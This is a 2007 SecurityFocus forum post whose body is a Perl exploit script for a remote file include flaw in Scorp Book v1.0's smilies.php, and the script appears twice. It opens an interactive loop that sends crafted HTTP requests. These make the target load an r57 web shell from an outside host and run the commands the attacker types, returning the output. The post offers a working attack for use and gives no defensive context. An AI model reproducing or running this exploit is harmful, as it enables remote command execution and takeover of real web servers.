Back to list
|
Post reply
Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit
Apr 08 2007 08:46AM
k4rtal gmail com
# [~] Portal : Scorp Book v1.0
# [~] Download : http://www.ectona.org/download/?id=598&s=info
# [~] Author : KaRTaLl | k4rtal (at) gmail (dot) com [email concealed]
# [~] Class : Remote File Include Exploit
use IO::Socket;
if (@ARGV < 2){
print "
+**********************************************************************+
* *
* # Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit *
* *
* # Usage : xpl.pl [Target] [Path] *
* *
* # Example : xpl.pl *
* *
* Vuln & Coded By KaRTaL *
+**********************************************************************+
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
print "\n[~] Please wait ...\n";
print "[~] Shell : ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path."/smilies.php?config=http://kartal.by.ru/r57.txt?/cmd?cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[~] Shell : ";
$cmd = <STDIN>;
}
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# [~] Download : http://www.ectona.org/download/?id=598&s=info
# [~] Author : KaRTaLl | k4rtal (at) gmail (dot) com [email concealed]
# [~] Class : Remote File Include Exploit
use IO::Socket;
if (@ARGV < 2){
print "
+**********************************************************************+
* *
* # Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit *
* *
* # Usage : xpl.pl [Target] [Path] *
* *
* # Example : xpl.pl *
* *
* Vuln & Coded By KaRTaL *
+**********************************************************************+
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
print "\n[~] Please wait ...\n";
print "[~] Shell : ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path."/smilies.php?config=http://kartal.by.ru/r57.txt?/cmd?cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[~] Shell : ";
$cmd = <STDIN>;
}
[ reply ]